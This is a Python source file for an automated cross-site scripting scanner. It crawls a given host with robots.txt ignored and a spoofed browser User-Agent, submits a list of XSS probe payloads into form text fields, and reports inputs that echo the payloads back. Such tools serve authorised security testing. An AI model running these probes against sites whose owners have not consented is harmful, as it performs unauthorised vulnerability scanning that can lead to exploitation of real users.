mechanize Browser
  1. #!/usr/bin/env python
  2. import mechanize
  3. import sys
  4. import httplib
  5. import argparse
  6. import logging
  7. from urlparse import urlparse
  8.  
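  # Shared mechanize browser; every request the scanner makes goes through it.
  br = mechanize.Browser()
  # Send a desktop-browser User-Agent instead of the library default.
  br.addheaders = [
      ('User-agent',
       'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')
  ]
  # Python's boolean literal is ``False``; the lowercase ``false`` used here
  # before is an undefined name and raised NameError before any scan started.
  # With robots handling off, robots.txt is not consulted while crawling.
  br.set_handle_robots(False)
  br.set_handle_refresh(False)

  # Probe strings submitted into text inputs.  testPayload() reports a hit when
  # a string comes back verbatim in the response body, i.e. the field was
  # echoed without output encoding.
  payloads = [
      '<h1>Hi</h1>',
      '<img src="http://inexist.ent" onerror="javascript:alert(1)"/>',
      '<svg onload="alert(/x/)">',
      '<script>alert("Hello")</script>',
      '<svg "ons>',
      '" onfocus="alert(1);',
      'javascript:alert(1)',
  ]
  # File extensions findxss() uses to skip links to static assets.
  blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg',
               '.pdf']
  # Report lines appended by testPayload(), one per reflected payload.
  xssLinks = []

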
  class color:
      """ANSI escape sequences for coloured console output, plus a log helper."""

      # Reset and bold first, then the bright foreground colours.
      END = '\033[0m'
      BOLD = '\033[1m'
      RED = '\033[91m'
      GREEN = '\033[92m'
      YELLOW = '\033[93m'
      BLUE = '\033[94m'

      @staticmethod
      def log(lvl, col, msg):
          """Log *msg* at level *lvl* through the module-level ``logger``.

          *col* is written in front of the message and ``END`` after it, so
          the colour is reset before any later output.
          """
          decorated = ''.join((col, msg, color.END))
          logger.log(lvl, decorated)


  # Usage banner, written in bold red every time the script starts.
  print(color.BOLD + color.RED +
        "\nComprehensive Scan: python XssPy.py -u website.com -e\n"
        "Verbose logging: python XssPy.py -u website.com -v\n"
        "Cookies: python XssPy.py -u website.complex -c name=val name=val\n" +
        color.END)

  # Console logger with an HH:MM:SS prefix; color.log() writes through it.
  logger = logging.getLogger(__name__)
  lh = logging.StreamHandler()
  formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S')
  lh.setFormatter(formatter)
  logger.addHandler(lh)

  # Command-line options.  -u is later handed to httplib.HTTPSConnection and
  # prefixed with "https://www.", so it is expected to be a bare host name.
  # Cookie values given with -c are plain command-line arguments and therefore
  # end up in shell history and process listings.
  parser = argparse.ArgumentParser()
  parser.add_argument('-u', dest='url', action='store',
                      help='The URL to analyze')
  parser.add_argument('-e', dest='compOn', action='store_true',
                      help='Enable comprehensive scan')
  parser.add_argument('-v', dest='verbose', action='store_true',
                      help='Enable verbose logging')
  parser.add_argument('-c', dest='cookies', action='store', nargs='+',
                      default=[],
                      help='Space separated list of cookies')
  results = parser.parse_args()

  # -v switches the logger from INFO to DEBUG.
  if results.verbose:
      logger.setLevel(logging.DEBUG)
  else:
      logger.setLevel(logging.INFO)


  def testPayload(payload, p, link):
      """Submit *payload* in form control *p* and record a verbatim reflection.

      The form currently selected on the shared browser ``br`` is filled and
      submitted.  When the response body contains *payload* unchanged, a
      report line is logged and appended to ``xssLinks``.  The browser then
      steps back one page.

      A verbatim echo shows the field was returned without output encoding;
      whether it executes depends on where in the page it lands, so each
      report is a lead to confirm by hand.  Only the immediate response is
      inspected, so stored or DOM-based issues are not visible to this check.
      """
      field = str(p.name)
      br.form[field] = payload
      br.submit()
      body = br.response().read()
      if payload in body:
          color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!')
          report = 'Link: %s, Payload: %s, Element: %s' % (str(link),
                                                           payload, field)
          color.log(logging.INFO, color.BOLD + color.GREEN, report)
          xssLinks.append(report)
      br.back()


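  def _inScope(candidate, scopeHost):
      """Return True when *candidate*'s host is *scopeHost* or a subdomain of it."""
      host = (urlparse(candidate).hostname or '').lower()
      return bool(scopeHost) and (host == scopeHost or
                                  host.endswith('.' + scopeHost))


  def initializeAndFind():
      """Crawl the target given with ``-u`` and return the links to test.

      Reads ``results.url`` (a bare host name), ``results.cookies`` and
      ``results.compOn``.  The start URL is chosen by probing the host over
      HTTPS; links found on the start page are collected, and with ``-e``
      each of those pages is opened once more to collect its links as well.

      Returns:
          A list of unique absolute URLs whose host is the target or one of
          its subdomains; an empty list when no URL was supplied.
      """
      if not results.url:
          color.log(logging.INFO, color.GREEN, 'Url not provided correctly')
          return []

      firstDomains = []
      allURLS = [results.url]
      largeNumberOfUrls = []

      for url in allURLS:
          smallurl = str(url)
          # Host part only (no port), lower-cased, for the scope comparison.
          scopeHost = smallurl.split(':')[0].lower()
          fallback = "http://www." + smallurl

          conn = None
          try:
              conn = httplib.HTTPSConnection(smallurl)
              conn.request("GET", "/")
              response = conn.getresponse()
              if response.status in (200, 302):
                  url = "https://www." + smallurl
              elif response.status == 301:
                  # getheader() returns a string (or None); it has to be
                  # parsed before .scheme/.netloc exist.  The old code read
                  # them off the string, raised AttributeError and always
                  # ended up on the plain-HTTP fallback.
                  location = response.getheader('Location') or ''
                  parsed = urlparse(location)
                  if (parsed.scheme in ('http', 'https') and
                          _inScope(location, scopeHost)):
                      url = parsed.scheme + '://' + parsed.netloc
                  else:
                      # Relative or off-target redirect: stay on the target.
                      url = fallback
              else:
                  url = fallback
          except Exception as exc:
              # Best effort: any probe failure means plain HTTP is tried.
              # ``Exception`` (not a bare except) lets Ctrl-C through.
              color.log(logging.DEBUG, color.YELLOW,
                        'HTTPS probe failed: %s' % exc)
              url = fallback
          finally:
              if conn is not None:
                  conn.close()

          try:
              # The page is opened before and after the cookies are set;
              # presumably mechanize needs a loaded page for set_cookie().
              br.open(url)
              for cookie in results.cookies:
                  # Log the cookie name only: values are usually session
                  # secrets and scan logs get copied into reports.
                  color.log(logging.INFO, color.BLUE,
                            'Adding cookie: %s' % cookie.split('=', 1)[0])
                  br.set_cookie(cookie)
              br.open(url)
              color.log(logging.INFO, color.GREEN,
                        'Finding all the links of the website ' + str(url))
              for link in br.links():
                  target = str(link.absolute_url)
                  # Compare hosts instead of searching for the target name
                  # anywhere in the URL, so a third-party link that merely
                  # mentions the target (e.g. in its query string) is not
                  # crawled or probed.
                  if _inScope(target, scopeHost):
                      firstDomains.append(target)
              firstDomains = list(set(firstDomains))
          except Exception as exc:
              color.log(logging.DEBUG, color.RED,
                        'Could not crawl %s: %s' % (url, exc))
          color.log(logging.INFO, color.GREEN,
                    'Number of links to test are: ' + str(len(firstDomains)))

          if results.compOn:
              # Comprehensive mode: one extra level of link discovery.
              for link in firstDomains:
                  try:
                      br.open(link)
                      for newlink in br.links():
                          target = str(newlink.absolute_url)
                          if _inScope(target, scopeHost):
                              largeNumberOfUrls.append(target)
                  except Exception as exc:
                      color.log(logging.DEBUG, color.RED,
                                'Could not crawl %s: %s' % (link, exc))
              firstDomains = list(set(firstDomains + largeNumberOfUrls))
              color.log(logging.INFO, color.GREEN,
                        'Total Number of links to test have become: ' +
                        str(len(firstDomains)))
      return firstDomains

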
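  def findxss(firstDomains):
      """Submit every payload into the text inputs of each link's first form.

      For each URL in *firstDomains* that does not point at a static asset,
      the page is opened, form number 0 is selected and every control whose
      repr contains ``TextControl`` is tested with each entry of
      ``payloads`` via testPayload().  Findings accumulate in ``xssLinks``
      and are listed at DEBUG level at the end.

      Coverage is limited to the first form and its text controls, so a run
      without findings is not evidence that a page is free of XSS.
      """
      color.log(logging.INFO, color.GREEN, 'Started finding XSS')
      if not firstDomains:
          color.log(logging.INFO, color.RED + color.BOLD,
                    '\tNo link found, exiting')
          return

      skipSuffixes = tuple(blacklist)
      for link in firstDomains:
          y = str(link)
          color.log(logging.DEBUG, color.YELLOW, y)
          # Test the extension of the URL path instead of searching the whole
          # URL, so a host or query string that merely contains ".gif" or
          # ".pdf" does not cause the page to be skipped.
          if urlparse(y).path.lower().endswith(skipSuffixes):
              color.log(logging.DEBUG, color.RED,
                        '\tNot a good url to test')
              continue
          try:
              br.open(y)
              # Materialise the forms once; the emptiness test has to be made
              # on the list, not on whatever iterable br.forms() returns.
              forms = list(br.forms())
              if not forms:
                  continue
              br.select_form(nr=0)
              # NOTE(review): testPayload() ends with br.back(); confirm the
              # form selection survives that call, otherwise only the first
              # payload is actually submitted for each page.
              for p in forms[0].controls:
                  if 'TextControl' in str(p):
                      color.log(logging.DEBUG, color.YELLOW,
                                '\tParam: ' + str(p.name))
                      for item in payloads:
                          testPayload(item, p, link)
          except Exception as exc:
              # Best effort per link, but say why it was skipped and let
              # Ctrl-C through (a bare except swallowed both).
              color.log(logging.DEBUG, color.RED,
                        '\tSkipping %s: %s' % (y, exc))

      color.log(logging.DEBUG, color.GREEN + color.BOLD,
                'The following links are vulnerable: ')
      for link in xssLinks:
          color.log(logging.DEBUG, color.GREEN, '\t' + link)

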
  # Script entry: collect the target's links first, then probe each of them.
  firstDomains = initializeAndFind()
  findxss(firstDomains)